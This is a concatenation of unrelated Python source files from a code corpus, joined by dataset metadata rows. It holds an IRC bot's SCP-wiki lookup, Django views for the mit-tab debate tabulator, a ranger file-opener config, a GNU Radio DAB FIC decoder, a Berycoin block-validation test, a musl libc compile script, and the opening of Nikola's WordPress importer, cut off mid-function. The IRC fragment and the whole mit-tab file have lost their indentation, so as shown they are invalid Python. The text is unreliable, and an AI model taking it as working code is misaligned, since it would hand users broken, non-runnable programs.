".scp <Article #> -- Will return exact match of 'SCP-Article#'"
api = wikidotapi.connection() #creates API connection
api.Site = "scp-wiki"
pages = api.refresh_pages() #refresh page list provided by the API, is only a list of strings
    line = re.sub("[ ,']",'-',inp) #replaces spaces, commas, and apostrophes with dashes, per wikidot's standards
for page in pages:
if "scp-"+line.lower() == page: #check for first match to input
            if api.page_exists(page.lower()): #only api call in .scp, verification of page existence
try: #must do error handling as the key will be wrong for most of the items
if "scp" in api.get_page_item(page,"tags"): #check for tag
rating = api.get_page_item(page,"rating")
if rating < 0:
ratesign = "-"
if rating >= 0:
ratesign = "+" #adds + or minus sign in front of rating
ratestring = "Rating["+ratesign+str(rating)+"]"
author = api.get_page_item(page,"created_by")
authorstring = "Written by "+author
title = api.get_page_item(page,"title")
sepstring = ", "
return "nonick::"+title+" ("+ratestring+sepstring+authorstring+") - http://scp-wiki.net/"+page.lower() #returns the string, nonick:: means that the caller's nick isn't prefixed
except KeyError:
pass
else:
return "nonick::Match found but page does not exist, please consult pixeltasim for error."
return "nonick::Page not found"
| unlicense | 500,851,740,016,759,800 | 45.911765 | 184 | 0.673149 | false |
jolynch/mit-tab | mittab/apps/tab/views.py | 1 | 14458 | from django.contrib.auth.decorators import permission_required
from django.contrib.auth import logout
from django.conf import settings
from django.http import HttpResponse, JsonResponse, Http404
from django.shortcuts import render, reverse, get_object_or_404
import yaml
from mittab.apps.tab.archive import ArchiveExporter
from mittab.apps.tab.forms import SchoolForm, RoomForm, UploadDataForm, ScratchForm, \
SettingsForm
from mittab.apps.tab.helpers import redirect_and_flash_error, \
redirect_and_flash_success
from mittab.apps.tab.models import *
from mittab.libs import cache_logic
from mittab.libs.tab_logic import TabFlags
from mittab.libs.data_import import import_judges, import_rooms, import_teams, \
import_scratches
def index(request):
number_teams = Team.objects.count()
number_judges = Judge.objects.count()
number_schools = School.objects.count()
number_debaters = Debater.objects.count()
number_rooms = Room.objects.count()
school_list = [(school.pk, school.name) for school in School.objects.all()]
judge_list = [(judge.pk, judge.name) for judge in Judge.objects.all()]
team_list = [(team.pk, team.display_backend) for team in Team.objects.all()]
debater_list = [(debater.pk, debater.display)
for debater in Debater.objects.all()]
room_list = [(room.pk, room.name) for room in Room.objects.all()]
return render(request, "common/index.html", locals())
def tab_logout(request, *args):
logout(request)
return redirect_and_flash_success(request,
"Successfully logged out",
path="/")
def render_403(request, *args, **kwargs):
response = render(request, "common/403.html")
response.status_code = 403
return response
def render_404(request, *args, **kwargs):
response = render(request, "common/404.html")
response.status_code = 404
return response
def render_500(request, *args, **kwargs):
response = render(request, "common/500.html")
response.status_code = 500
return response
#View for manually adding scratches
def add_scratch(request):
if request.method == "POST":
form = ScratchForm(request.POST)
if form.is_valid():
form.save()
return redirect_and_flash_success(request,
"Scratch created successfully")
else:
form = ScratchForm(initial={"scratch_type": 0})
return render(request, "common/data_entry.html", {
"title": "Adding Scratch",
"form": form
})
#### BEGIN SCHOOL ###
#Three views for entering, viewing, and editing schools
def view_schools(request):
    #Get a list of (id, school_name, flags, symbols) tuples
c_schools = [(s.pk, s.name, 0, "") for s in School.objects.all()]
return render(
request, "common/list_data.html", {
"item_type": "school",
"title": "Viewing All Schools",
"item_list": c_schools
})
def view_school(request, school_id):
school_id = int(school_id)
try:
school = School.objects.get(pk=school_id)
except School.DoesNotExist:
return redirect_and_flash_error(request, "School not found")
if request.method == "POST":
form = SchoolForm(request.POST, instance=school)
if form.is_valid():
try:
form.save()
except ValueError:
return redirect_and_flash_error(
request,
"School name cannot be validated, most likely a non-existent school"
)
return redirect_and_flash_success(
request, "School {} updated successfully".format(
form.cleaned_data["name"]))
else:
form = SchoolForm(instance=school)
links = [("/school/" + str(school_id) + "/delete/", "Delete")]
return render(
request, "common/data_entry.html", {
"form": form,
"links": links,
"title": "Viewing School: %s" % (school.name)
})
def enter_school(request):
if request.method == "POST":
form = SchoolForm(request.POST)
if form.is_valid():
try:
form.save()
except ValueError:
return redirect_and_flash_error(
request,
"School name cannot be validated, most likely a duplicate school"
)
return redirect_and_flash_success(
request,
"School {} created successfully".format(
form.cleaned_data["name"]),
path="/")
else:
form = SchoolForm()
return render(request, "common/data_entry.html", {
"form": form,
"title": "Create School"
})
@permission_required("tab.school.can_delete", login_url="/403/")
def delete_school(request, school_id):
error_msg = None
try:
school_id = int(school_id)
school = School.objects.get(pk=school_id)
school.delete()
except School.DoesNotExist:
error_msg = "That school does not exist"
except Exception as e:
error_msg = str(e)
if error_msg:
return redirect_and_flash_error(request, error_msg)
return redirect_and_flash_success(request,
"School deleted successfully",
path="/")
#### END SCHOOL ###
#### BEGIN ROOM ###
def view_rooms(request):
def flags(room):
result = 0
if room.rank == 0:
result |= TabFlags.ROOM_ZERO_RANK
else:
result |= TabFlags.ROOM_NON_ZERO_RANK
return result
all_flags = [[TabFlags.ROOM_ZERO_RANK, TabFlags.ROOM_NON_ZERO_RANK]]
all_rooms = [(room.pk, room.name, flags(room),
TabFlags.flags_to_symbols(flags(room)))
for room in Room.objects.all()]
filters, symbol_text = TabFlags.get_filters_and_symbols(all_flags)
return render(
request, "common/list_data.html", {
"item_type": "room",
"title": "Viewing All Rooms",
"item_list": all_rooms,
"symbol_text": symbol_text,
"filters": filters
})
def view_room(request, room_id):
room_id = int(room_id)
try:
room = Room.objects.get(pk=room_id)
except Room.DoesNotExist:
return redirect_and_flash_error(request, "Room not found")
if request.method == "POST":
form = RoomForm(request.POST, instance=room)
if form.is_valid():
try:
form.save()
except ValueError:
return redirect_and_flash_error(
request,
"Room name cannot be validated, most likely a non-existent room"
)
return redirect_and_flash_success(
request, "School {} updated successfully".format(
form.cleaned_data["name"]))
else:
form = RoomForm(instance=room)
return render(request, "common/data_entry.html", {
"form": form,
"links": [],
"title": "Viewing Room: %s" % (room.name)
})
def enter_room(request):
if request.method == "POST":
form = RoomForm(request.POST)
if form.is_valid():
try:
form.save()
except ValueError:
return redirect_and_flash_error(
request,
"Room name cannot be validated, most likely a duplicate room"
)
return redirect_and_flash_success(
request,
"Room {} created successfully".format(
form.cleaned_data["name"]),
path="/")
else:
form = RoomForm()
return render(request, "common/data_entry.html", {
"form": form,
"title": "Create Room"
})
def batch_checkin(request):
rooms_and_checkins = []
    round_numbers = [i + 1 for i in range(TabSettings.get("tot_rounds"))]
for room in Room.objects.all():
checkins = []
for round_number in [0] + round_numbers: # 0 is for outrounds
checkins.append(room.is_checked_in_for_round(round_number))
rooms_and_checkins.append((room, checkins))
return render(request, "tab/room_batch_checkin.html", {
"rooms_and_checkins": rooms_and_checkins,
"round_numbers": round_numbers
})
@permission_required("tab.tab_settings.can_change", login_url="/403")
def room_check_in(request, room_id, round_number):
room_id, round_number = int(room_id), int(round_number)
if round_number < 0 or round_number > TabSettings.get("tot_rounds"):
# 0 is so that outrounds don't throw an error
raise Http404("Round does not exist")
room = get_object_or_404(Room, pk=room_id)
if request.method == "POST":
if not room.is_checked_in_for_round(round_number):
check_in = RoomCheckIn(room=room, round_number=round_number)
check_in.save()
elif request.method == "DELETE":
if room.is_checked_in_for_round(round_number):
check_ins = RoomCheckIn.objects.filter(room=room,
round_number=round_number)
check_ins.delete()
else:
raise Http404("Must be POST or DELETE")
return JsonResponse({"success": True})
@permission_required("tab.scratch.can_delete", login_url="/403/")
def delete_scratch(request, item_id, scratch_id):
try:
scratch_id = int(scratch_id)
scratch = Scratch.objects.get(pk=scratch_id)
scratch.delete()
except Scratch.DoesNotExist:
return redirect_and_flash_error(
request,
"This scratch does not exist, please try again with a valid id.")
return redirect_and_flash_success(request,
"Scratch deleted successfully",
path="/")
def view_scratches(request):
    # Get a list of (team_id, scratch_description, flags, symbols) tuples
c_scratches = [(s.team.pk, str(s), 0, "") for s in Scratch.objects.all()]
return render(
request, "common/list_data.html", {
"item_type": "team",
"title": "Viewing All Scratches for Teams",
"item_list": c_scratches
})
def get_settings_from_yaml():
default_settings = []
with open(settings.SETTING_YAML_PATH, "r") as stream:
default_settings = yaml.safe_load(stream)
to_return = []
for setting in default_settings:
tab_setting = TabSettings.objects.filter(key=setting["name"]).first()
if tab_setting:
if "type" in setting and setting["type"] == "boolean":
setting["value"] = tab_setting.value == 1
else:
setting["value"] = tab_setting.value
to_return.append(setting)
return to_return
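# Illustrative shape of an entry in SETTING_YAML_PATH as consumed above (the
# "name"/"type"/"value" keys come from this function; the setting names are
# assumptions):
#   - name: tot_rounds
#     value: 5
#   - name: debaters_public
#     type: boolean
#     value: true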
### SETTINGS VIEWS ###
@permission_required("tab.tab_settings.can_change", login_url="/403/")
def settings_form(request):
yaml_settings = get_settings_from_yaml()
if request.method == "POST":
_settings_form = SettingsForm(request.POST, settings=yaml_settings)
if _settings_form.is_valid():
_settings_form.save()
return redirect_and_flash_success(
request,
"Tab settings updated!",
path=reverse("settings_form")
)
return render( # Allows for proper validation checking
request, "tab/settings_form.html", {
"form": settings_form,
})
_settings_form = SettingsForm(settings=yaml_settings)
return render(
request, "tab/settings_form.html", {
"form": _settings_form,
})
def upload_data(request):
team_info = {"errors": [], "uploaded": False}
judge_info = {"errors": [], "uploaded": False}
room_info = {"errors": [], "uploaded": False}
scratch_info = {"errors": [], "uploaded": False}
if request.method == "POST":
form = UploadDataForm(request.POST, request.FILES)
if form.is_valid():
if "team_file" in request.FILES:
team_info["errors"] = import_teams.import_teams(
request.FILES["team_file"])
team_info["uploaded"] = True
if "judge_file" in request.FILES:
judge_info["errors"] = import_judges.import_judges(
request.FILES["judge_file"])
judge_info["uploaded"] = True
if "room_file" in request.FILES:
room_info["errors"] = import_rooms.import_rooms(
request.FILES["room_file"])
room_info["uploaded"] = True
if "scratch_file" in request.FILES:
scratch_info["errors"] = import_scratches.import_scratches(
request.FILES["scratch_file"])
scratch_info["uploaded"] = True
if not team_info["errors"] + judge_info["errors"] + \
room_info["errors"] + scratch_info["errors"]:
return redirect_and_flash_success(request,
"Data imported successfully")
else:
form = UploadDataForm()
return render(
request, "common/data_upload.html", {
"form": form,
"title": "Upload Input Files",
"team_info": team_info,
"judge_info": judge_info,
"room_info": room_info,
"scratch_info": scratch_info
})
def force_cache_refresh(request):
key = request.GET.get("key", "")
cache_logic.invalidate_cache(key)
redirect_to = request.GET.get("next", "/")
return redirect_and_flash_success(request,
"Refreshed!",
path=redirect_to)
@permission_required("tab.tab_settings.can_change", login_url="/403/")
def generate_archive(request):
tournament_name = request.META["SERVER_NAME"].split(".")[0]
filename = tournament_name + ".xml"
xml = ArchiveExporter(tournament_name).export_tournament()
response = HttpResponse(xml, content_type="text/xml; charset=utf-8")
response["Content-Length"] = len(xml)
response["Content-Disposition"] = "attachment; filename=%s" % filename
return response
| mit | 2,092,619,775,941,231,000 | 33.588517 | 88 | 0.572832 | false |
AlanWarren/dotfiles | .config/ranger/apps_bak.py | 1 | 7092 | # Copyright (C) 2009, 2010 Roman Zimbelmann <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This is the default ranger configuration file for filetype detection
and application handling.
You can place this file in your ~/.ranger/ directory and it will be used
instead of this one. Though, to minimize your effort when upgrading ranger,
you may want to subclass CustomApplications rather than making a full copy.
This example modifies the behaviour of "feh" and adds a custom media player:
#### start of the ~/.ranger/apps.py example
from ranger.defaults.apps import CustomApplications as DefaultApps
from ranger.api.apps import *
class CustomApplications(DefaultApps):
def app_kaffeine(self, c):
return tup('kaffeine', *c)
def app_feh_fullscreen_by_default(self, c):
return tup('feh', '-F', *c)
def app_default(self, c):
f = c.file #shortcut
if f.video or f.audio:
return self.app_kaffeine(c)
if f.image and c.mode == 0:
return self.app_feh_fullscreen_by_default(c)
return DefaultApps.app_default(self, c)
#### end of the example
"""
from ranger.api.apps import *
from ranger.ext.get_executables import get_executables
class CustomApplications(Applications):
def app_default(self, c):
"""How to determine the default application?"""
f = c.file
if f.basename.lower() == 'makefile':
return self.either(c, 'make')
if f.extension is not None:
if f.extension in ('pdf', ):
c.flags += 'd'
return self.either(c, 'evince', 'zathura', 'apvlv')
if f.extension in ('xml', ):
return self.either(c, 'editor')
if f.extension in ('html', 'htm', 'xhtml'):
return self.either(c, 'vim', 'gvim', 'nano')
if f.extension in ('swf', ):
return self.either(c, 'firefox', 'opera')
if f.extension == 'nes':
return self.either(c, 'fceux')
if f.extension in ('swc', 'smc'):
return self.either(c, 'zsnes')
if f.mimetype is not None:
if INTERPRETED_LANGUAGES.match(f.mimetype):
return self.either(c, 'edit_or_run')
if f.container:
return self.either(c, 'aunpack', 'file_roller')
if f.video or f.audio:
if f.video:
c.flags += 'd'
return self.either(c, 'mplayer', 'totem', 'ffmpeg')
if f.image:
return self.either(c, 'feh', 'eog', 'mirage')
if f.document or f.filetype.startswith('text'):
return self.either(c, 'vim')
# ----------------------------------------- application definitions
# Note: Trivial applications are defined at the bottom
def app_pager(self, c):
return tup('less', *c)
def app_editor(self, c):
try:
c.flags += 'd'
default_editor = os.environ['EDITOR']
except KeyError:
pass
else:
parts = default_editor.split()
exe_name = os.path.basename(parts[0])
if exe_name in get_executables():
return tuple(parts) + tuple(c)
return self.either(c, 'vim', 'emacs', 'nano')
def app_edit_or_run(self, c):
        if c.mode == 1:
return self.app_self(c)
return self.app_editor(c)
@depends_on('mplayer')
def app_mplayer(self, c):
        if c.mode == 1:
return tup('mplayer', '-fs', *c)
        elif c.mode == 2:
args = "mplayer -fs -sid 0 -vfm ffmpeg -lavdopts " \
"lowres=1:fast:skiploopfilter=all:threads=8".split()
args.extend(c)
return tup(*args)
        elif c.mode == 3:
return tup('mplayer', '-mixer', 'software', *c)
else:
return tup('mplayer', *c)
@depends_on('feh')
def app_feh(self, c):
arg = {1: '--bg-scale', 2: '--bg-tile', 3: '--bg-center'}
c.flags += 'd'
if c.mode in arg: # mode 1, 2 and 3 will set the image as the background
return tup('feh', arg[c.mode], c.file.path)
        if c.mode == 11 and len(c.files) == 1: # view all files in the cwd
images = (f.basename for f in self.fm.env.cwd.files if f.image)
return tup('feh', '-w', '--start-at', c.file.basename, *images)
        if c.mode == 12: # fullscreen
return tup('feh', '-F', *c)
        if c.mode == 13: # index mode
return tup('feh', '-I', *c)
        if c.mode == 14: # thumbnail
return tup('feh', '-t', *c)
@depends_on('aunpack')
def app_aunpack(self, c):
        if c.mode == 0:
c.flags += 'p'
return tup('aunpack', '-l', c.file.path)
return tup('aunpack', c.file.path)
@depends_on('file-roller')
def app_file_roller(self, c):
c.flags += 'd'
return tup('file-roller', c.file.path)
@depends_on('make')
def app_make(self, c):
        if c.mode == 0:
            return tup("make")
        if c.mode == 1:
            return tup("make", "install")
        if c.mode == 2:
            return tup("make", "clean") # "clear" is not a standard make target
@depends_on('ffmpeg')
def app_ffmpeg(self, c):
def strip_extensions(file):
if '.' in file.basename:
fp = file.path[:file.path.index('.')]
return os.path.basename(fp)
return os.path.basename(file.path)
        # target names: stripped basenames with '.flv' appended
        files_without_extensions = [strip_extensions(f) + '.flv' for f in c.files]
def list_to_string(file):
return " ".join(["%s" % el for el in file])
        if c.mode == 0:
return "ffmpeg -i " + c.file.basename + " -ar 44100 -sameq -f flv " + list_to_string(files_without_extensions)
@depends_on('java')
def app_java(self, c):
def strip_extensions(file):
if '.' in file.basename:
return file.path[:file.path.index('.')]
return file.path
files_without_extensions = map(strip_extensions, c.files)
return tup("java", files_without_extensions)
@depends_on('totem')
def app_totem(self, c):
        if c.mode == 0:
            return tup("totem", *c)
        if c.mode == 1:
            return tup("totem", "--fullscreen", *c)
# Often a programs invocation is trivial. For example:
# vim test.py readme.txt [...]
# This could be implemented like:
@depends_on('vim')
def app_vim(self, c):
        if c.mode == 0:
return tup("vim", *c)
#@depends_on('vim')
#def app_vim(self, c):
#return tup("urxvtc", "-e", "vim", *c.files)
app_editor = app_vim
# Instead of creating such a generic function for each program, just add
# its name here and it will be automatically done for you.
CustomApplications.generic('vim', 'fceux', 'elinks', 'wine',
'zsnes', 'javac')
# By setting flags='d', this programs will not block ranger's terminal:
CustomApplications.generic('opera', 'firefox', 'apvlv', 'evince',
'zathura', 'gimp', 'mirage', 'eog', flags='d')
# What filetypes are recognized as scripts for interpreted languages?
# This regular expression is used in app_default()
INTERPRETED_LANGUAGES = re.compile(r'''
^(text|application)/x-(
haskell|perl|python|ruby|sh
)$''', re.VERBOSE)
| gpl-2.0 | -5,672,769,681,852,613,000 | 29.437768 | 114 | 0.656796 | false |
andrmuel/gr-dab | python/fic.py | 1 | 7506 | #!/usr/bin/env python
#
# Copyright 2008 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# Andreas Mueller, 2008
# [email protected]
from gnuradio import gr, trellis, blocks
from . import grdab_swig as grdab
from math import sqrt
"""
DAB FIC layer
"""
class fic_decode(gr.hier_block2):
"""
@brief block to decode FIBs (fast information blocks) from the FIC (fast information channel) of a demodulated DAB signal
- get FIBs from byte stream
- do convolutional decoding
- undo energy dispersal
- get FIC information
"""
def __init__(self, dab_params, verbose=False, debug=False):
"""
Hierarchical block for FIC decoding
@param dab_params DAB parameter object (grdab.parameters.dab_parameters)
"""
gr.hier_block2.__init__(self, "fic",
gr.io_signature(1, 1, gr.sizeof_float * dab_params.num_carriers * 2),
gr.io_signature(1, 1, gr.sizeof_char * 32))
self.dp = dab_params
self.verbose = verbose
self.debug = debug
# FIB selection and block partitioning
self.select_fic_syms = grdab.select_vectors(gr.sizeof_float, self.dp.num_carriers * 2, self.dp.num_fic_syms, 0)
self.repartition_fic = grdab.repartition_vectors(gr.sizeof_float, self.dp.num_carriers * 2,
self.dp.fic_punctured_codeword_length, self.dp.num_fic_syms,
self.dp.num_cifs)
# unpuncturing
self.unpuncture = grdab.unpuncture_vff(self.dp.assembled_fic_puncturing_sequence, 0)
# convolutional coding
# self.fsm = trellis.fsm(self.dp.conv_code_in_bits, self.dp.conv_code_out_bits, self.dp.conv_code_generator_polynomials)
self.fsm = trellis.fsm(1, 4, [0o133, 0o171, 0o145, 0o133]) # OK (dumped to text and verified partially)
self.conv_v2s = blocks.vector_to_stream(gr.sizeof_float, self.dp.fic_conv_codeword_length)
# self.conv_decode = trellis.viterbi_combined_fb(self.fsm, 20, 0, 0, 1, [1./sqrt(2),-1/sqrt(2)] , trellis.TRELLIS_EUCLIDEAN)
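        # The table below enumerates, row by row, all 4-bit output symbols of the
        # rate-1/4 convolutional code (16 rows, matching self.fsm.O()). The list
        # comprehension after it rescales each bit to a bipolar soft symbol:
        # bit 0 -> +1/sqrt(2), bit 1 -> -1/sqrt(2), to match the soft bits fed in.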
table = [
0, 0, 0, 0,
0, 0, 0, 1,
0, 0, 1, 0,
0, 0, 1, 1,
0, 1, 0, 0,
0, 1, 0, 1,
0, 1, 1, 0,
0, 1, 1, 1,
1, 0, 0, 0,
1, 0, 0, 1,
1, 0, 1, 0,
1, 0, 1, 1,
1, 1, 0, 0,
1, 1, 0, 1,
1, 1, 1, 0,
1, 1, 1, 1
]
        assert (len(table) // 4 == self.fsm.O())
table = [(1 - 2 * x) / sqrt(2) for x in table]
self.conv_decode = trellis.viterbi_combined_fb(self.fsm, 774, 0, 0, 4, table, trellis.TRELLIS_EUCLIDEAN)
#self.conv_s2v = blocks.stream_to_vector(gr.sizeof_char, 774)
        self.conv_prune = grdab.prune(gr.sizeof_char, self.dp.fic_conv_codeword_length // 4, 0,
self.dp.conv_code_add_bits_input)
# energy dispersal
self.prbs_src = blocks.vector_source_b(self.dp.prbs(self.dp.energy_dispersal_fic_vector_length), True)
#self.energy_v2s = blocks.vector_to_stream(gr.sizeof_char, self.dp.energy_dispersal_fic_vector_length)
self.add_mod_2 = blocks.xor_bb()
self.energy_s2v = blocks.stream_to_vector(gr.sizeof_char, self.dp.energy_dispersal_fic_vector_length)
self.cut_into_fibs = grdab.repartition_vectors(gr.sizeof_char, self.dp.energy_dispersal_fic_vector_length,
self.dp.fib_bits, 1, self.dp.energy_dispersal_fic_fibs_per_vector)
# connect all
self.nullsink = blocks.null_sink(gr.sizeof_char)
self.pack = blocks.unpacked_to_packed_bb(1, gr.GR_MSB_FIRST)
self.fibout = blocks.stream_to_vector(1, 32)
# self.filesink = gr.file_sink(gr.sizeof_char, "debug/fic.dat")
self.fibsink = grdab.fib_sink_vb()
# self.connect((self,0), (self.select_fic_syms,0), (self.repartition_fic,0), self.unpuncture, self.conv_v2s, self.conv_decode, self.conv_s2v, self.conv_prune, self.energy_v2s, self.add_mod_2, self.energy_s2v, (self.cut_into_fibs,0), gr.vector_to_stream(1,256), gr.unpacked_to_packed_bb(1,gr.GR_MSB_FIRST), self.filesink)
self.connect((self, 0),
(self.select_fic_syms, 0),
(self.repartition_fic, 0),
self.unpuncture,
self.conv_v2s,
self.conv_decode,
#self.conv_s2v,
self.conv_prune,
#self.energy_v2s,
self.add_mod_2,
self.energy_s2v,
(self.cut_into_fibs, 0),
blocks.vector_to_stream(1, 256),
self.pack,
self.fibout,
self.fibsink)
self.connect(self.fibout, self)
self.connect(self.prbs_src, (self.add_mod_2, 1))
if self.debug:
self.connect((self, 0), blocks.file_sink(gr.sizeof_float * self.dp.num_carriers * 2, "debug/transmission_frame.dat"))
self.connect((self, 1), blocks.file_sink(gr.sizeof_char, "debug/transmission_frame_trigger.dat"))
self.connect(self.select_fic_syms, blocks.file_sink(gr.sizeof_float * self.dp.num_carriers * 2, "debug/fic_select_syms.dat"))
self.connect(self.repartition_fic, blocks.file_sink(gr.sizeof_float * self.dp.fic_punctured_codeword_length, "debug/fic_repartitioned.dat"))
self.connect(self.unpuncture, blocks.file_sink(gr.sizeof_float * self.dp.fic_conv_codeword_length, "debug/fic_unpunctured.dat"))
self.connect(self.conv_decode, blocks.file_sink(gr.sizeof_char, "debug/fic_decoded.dat"))
self.connect(self.conv_prune, blocks.file_sink(gr.sizeof_char, "debug/fic_decoded_pruned.dat"))
#self.connect(self.conv_decode, blocks.file_sink(gr.sizeof_char * self.dp.energy_dispersal_fic_vector_length, "debug/fic_energy_dispersal_undone.dat"))
self.connect(self.pack, blocks.file_sink(gr.sizeof_char, "debug/fic_energy_undone.dat"))
def get_ensemble_info(self):
return self.fibsink.get_ensemble_info()
def get_service_info(self):
return self.fibsink.get_service_info()
def get_service_labels(self):
return self.fibsink.get_service_labels()
def get_subch_info(self):
return self.fibsink.get_subch_info()
def get_programme_type(self):
return self.fibsink.get_programme_type()
def get_crc_passed(self):
return self.fibsink.get_crc_passed()
def set_print_channel_info(self, val):
self.fibsink.set_print_channel_info(val)
| gpl-3.0 | 1,466,706,085,345,232,100 | 45.333333 | 328 | 0.602718 | false |
berycoin-project/berycoin | test/functional/berycoin-spend-op-call.py | 1 | 2271 | #!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.berycoin import *
from test_framework.address import *
from test_framework.blocktools import *
import time
import io
class BerycoinSpendOpCallTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
self.nodes[0].generate(10+COINBASE_MATURITY)
# Create a new contract that can receive funds
"""
pragma solidity ^0.4.12;
contract Test {
function () payable {}
}
"""
contract_bytecode = "60606040523415600e57600080fd5b5b603580601c6000396000f30060606040525b5b5b0000a165627a7a723058202a205a0473a338a161903e98bd0920e9c01b9ab0a8f94f8f19028c49733fb60d0029"
first_contract_address = self.nodes[0].createcontract(contract_bytecode)['address']
self.nodes[0].generate(1)
# Send 100000 berycoin to the contract
self.nodes[0].sendtocontract(first_contract_address, "00", 100000)['txid']
blockhash = self.nodes[0].generate(1)[0]
prev_block = self.nodes[0].getblock(blockhash)
# Extract the transaction which will be the prevout to spend the contract's funds later on
op_call_txid = prev_block['tx'][-1]
block = create_block(int(prev_block['hash'], 16), create_coinbase(prev_block['height']+1), prev_block['time']+1)
block.hashStateRoot = int(prev_block['hashStateRoot'], 16)
block.hashUTXORoot = int(prev_block['hashUTXORoot'], 16)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(op_call_txid, 16), 0), scriptSig=CScript([]))]
tx.vout = [CTxOut(int(100000*COIN), scriptPubKey=CScript([OP_TRUE]))]
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
block_count = self.nodes[0].getblockcount()
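        # The transaction above spends the contract's OP_CALL output directly,
        # bypassing the usual condensing-transaction mechanism, so the node is
        # expected to reject the block -- hence the unchanged height below.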
ret = self.nodes[0].submitblock(bytes_to_hex_str(block.serialize()))
assert_equal(self.nodes[0].getblockcount(), block_count)
if __name__ == '__main__':
BerycoinSpendOpCallTest().main()
| gpl-3.0 | -3,772,808,376,688,454,700 | 38.155172 | 192 | 0.672831 | false |
windelbouwman/ppci-mirror | tools/compile_musl_libc.py | 1 | 2076 |
""" Helper script to help in compilation of the musl libc.
See for the musl library:
https://www.musl-libc.org/
"""
import os
import logging
import glob
import time
import traceback
from ppci.api import cc
from ppci.lang.c import COptions
from ppci.common import CompilerError, logformat
home = os.environ['HOME']
musl_folder = os.path.join(home, 'GIT', 'musl')
cache_filename = os.path.join(musl_folder, 'ppci_build.cache')
def do_compile(filename):
include_paths = [
os.path.join(musl_folder, 'include'),
os.path.join(musl_folder, 'src', 'internal'),
os.path.join(musl_folder, 'obj', 'include'),
os.path.join(musl_folder, 'arch', 'x86_64'),
os.path.join(musl_folder, 'arch', 'generic'),
]
coptions = COptions()
coptions.add_include_paths(include_paths)
with open(filename, 'r') as f:
obj = cc(f, 'x86_64', coptions=coptions)
return obj
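# Usage sketch (illustrative): compile one musl source file to a ppci object, e.g.
#   obj = do_compile(os.path.join(musl_folder, 'src', 'string', 'memcpy.c'))
# main() below does the same over a glob of source files.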
def main():
t1 = time.time()
print('Using musl folder:', musl_folder)
crypt_md5_c = os.path.join(musl_folder, 'src', 'crypt', 'crypt_md5.c')
failed = 0
passed = 0
# file_pattern = os.path.join(musl_folder, 'src', 'crypt', '*.c')
# file_pattern = os.path.join(musl_folder, 'src', 'string', '*.c')
file_pattern = os.path.join(musl_folder, 'src', 'regex', '*.c')
for filename in glob.iglob(file_pattern):
print('==> Compiling', filename)
try:
do_compile(filename)
except CompilerError as ex:
print('Error:', ex.msg, ex.loc)
ex.print()
traceback.print_exc()
failed += 1
# break
except Exception as ex:
print('General exception:', ex)
traceback.print_exc()
failed += 1
# break
else:
print('Great success!')
passed += 1
t2 = time.time()
elapsed = t2 - t1
print('Passed:', passed, 'failed:', failed, 'in', elapsed, 'seconds')
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format=logformat)
main()
| bsd-2-clause | -8,647,182,432,270,367,000 | 27.833333 | 74 | 0.587187 | false |
wcmckee/nikola | nikola/plugins/command/import_wordpress.py | 1 | 52729 | # -*- coding: utf-8 -*-
# Copyright © 2012-2016 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Import a WordPress dump."""
from __future__ import unicode_literals, print_function
import os
import re
import sys
import datetime
import io
import json
import requests
from lxml import etree
from collections import defaultdict
try:
import html2text
except ImportError:
html2text = None
try:
from urlparse import urlparse
from urllib import unquote
except ImportError:
from urllib.parse import urlparse, unquote # NOQA
try:
import phpserialize
except ImportError:
phpserialize = None # NOQA
from nikola.plugin_categories import Command
from nikola import utils
from nikola.utils import req_missing, unicode_str
from nikola.plugins.basic_import import ImportMixin, links
from nikola.nikola import DEFAULT_TRANSLATIONS_PATTERN
from nikola.plugins.command.init import SAMPLE_CONF, prepare_config, format_default_translations_config
LOGGER = utils.get_logger('import_wordpress', utils.STDERR_HANDLER)
def install_plugin(site, plugin_name, output_dir=None, show_install_notes=False):
"""Install a Nikola plugin."""
LOGGER.notice("Installing plugin '{0}'".format(plugin_name))
# Get hold of the 'plugin' plugin
plugin_installer_info = site.plugin_manager.getPluginByName('plugin', 'Command')
if plugin_installer_info is None:
LOGGER.error('Internal error: cannot find the "plugin" plugin which is supposed to come with Nikola!')
return False
if not plugin_installer_info.is_activated:
